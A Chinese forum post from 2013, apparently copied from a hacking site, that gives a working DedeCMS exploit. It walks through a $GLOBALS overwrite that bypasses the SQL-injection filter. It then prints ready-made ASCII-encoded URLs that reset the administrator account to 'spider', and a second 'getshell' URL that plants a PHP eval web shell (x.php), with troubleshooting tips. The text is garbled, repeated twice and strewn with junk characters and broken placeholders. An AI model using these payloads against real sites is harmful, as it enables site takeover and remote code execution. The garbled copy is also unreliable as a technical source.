|
|
此漏洞无视gpc转义,过80sec注入防御。
0 q) d7 t# B* F. f5 B1 D补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?8 B2 q2 H% V, g6 n0 n& ]( Q3 h5 T
起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。2 C ] {' T3 |) R* e
include/dedesql.class.php
5 z8 J t$ A, E2 a/ B' A/ e6 dif(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。& o5 u: Y. w8 s% E
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2 U6 F+ I4 m5 ^; m
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。& }9 n+ N" |# b2 t* X& v
plus/download.php
8 Y2 [$ j/ F* E5 @* I- N2 |% x- {else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location link"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):$ t! J) N# y; m3 s
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:2 L/ y7 J" F6 | G
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:. q/ j1 w% X* L% D
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
$ _% n5 q+ ~. n: a漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。9 e, j+ y& v* B1 j9 ^7 L& w5 q
如果找不到后台,参见以前修改数据库直接拿SHELL的方法; f i. m8 T' Z$ I1 w) P$ t& b
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval(此漏洞无视gpc转义,过80sec注入防御。3 R% L, ]1 l& h
补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?+ J+ a& v$ I% q% o! p" d, n
起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。2 W f& y5 D/ y) g8 x7 k5 p- a
include/dedesql.class.php
3 ]0 a( T2 T4 y; b6 K1 rif(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。
* P& F3 L2 E O9 O: {7 {同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2! g- Q7 Q- x9 S2 c, l! @4 R0 ~" Q
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。
' ?8 l: A) @! V" P* H' H: P- [' zplus/download.php) b+ N: \& {& i& S9 R+ X% C" [
else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("locationlink"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
7 m# Z: p ~3 ?/ L' p6 Tadmin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
$ I' l( @% F4 ?; F# KUPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:
. V3 K& Z1 C$ ~+ n0 F! w' khttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
3 C/ p( |/ l3 L* f漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
r% g4 K4 u7 b% N/ l* ~% Y3 i如果找不到后台,参见以前修改数据库直接拿SHELL的方法* W% } I; n( l8 f) f8 l* p
___FCKpd___6getshell:
& c6 c4 H9 k" Uhttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35会在plus目录生成 x.php 密码 m1 P- A5 {9 C7 `+ {+ K" V
http://127.0.0.1/plus/x.php9 L% `# ^* v. H* \. | `
update成功后还要访问下 /plus/mytag_js.php?aid=1
$ S6 C3 D& v1 o+ a, J7 m% s* T& `失败原因:
9 I7 T# J0 }# ~. w! q7 q+ z2 e! c2 p测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
- P& y; Z1 g+ M* p. E配图:9 p( s9 j6 p# ~9 d" {, ]" ]
1.查看dede当前版本
8 Q3 `4 R: z: R4 {% S0 y) z2 y3 Z, M3 C5 O4 d4 u
2.执行exp9 X/ ^0 [( U: {% F' S, ]/ R
! l) Q8 l A7 \, \% [( `: b+ vhttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台
9 q, O) N8 P* P' |) _
8 E0 i3 Y/ T2 O: I6 j8 V" xspider密码admin$ ^" m* }% X" d. s
+ \& {5 q9 U* {& h) v& j
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png) k9 T5 {/ i- ^# {& e
原作者:imspider
( B$ f/ {- B, ?! [* x
0 l8 N5 }! y9 J7 H本博客测试+配图+getshell( j: t0 k5 B A
POST[spider]);?-->'');{/dede:php}' WHERE `aid` =1 LIMIT
/ z, C5 ^4 s" S4 ?( u. l& b% I& I/ k3 D
getshell:% {% g/ {. U$ J8 a1 a
___FCKpd___7会在plus目录生成 x.php 密码 m
6 P! H: j! t/ ?9 ?! {: Lhttp://127.0.0.1/plus/x.php
# }- `; p+ O# N/ p- B' P# Eupdate成功后还要访问下 /plus/mytag_js.php?aid=17 g( U+ M9 ~; b5 X
失败原因:0 c; p- i) G0 X( e
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
" ^ g9 @( a2 V, c0 ^配图:. t' u, p# n- x5 Y. z
1.查看dede当前版本9 G/ k' W9 f. f3 M
http://www.myhack58.com/Article/UploadPic/2013-9/20139913326739.png
* i% Z5 R( ^6 o$ E4 S2.执行exp, A# _( w+ |, ]0 U- y
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台
7 ?5 Z7 G! H# t2 f) N2 y, }( nspider密码admin( q& U" r, X9 T, D8 U/ y1 y
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png6 T' @5 L: ^$ M p4 x& X+ D
( ^1 H1 ?( a5 w1 n7 X7 F' a
|
|
发表于 2013-9-21 16:08:21
收藏
支持
反对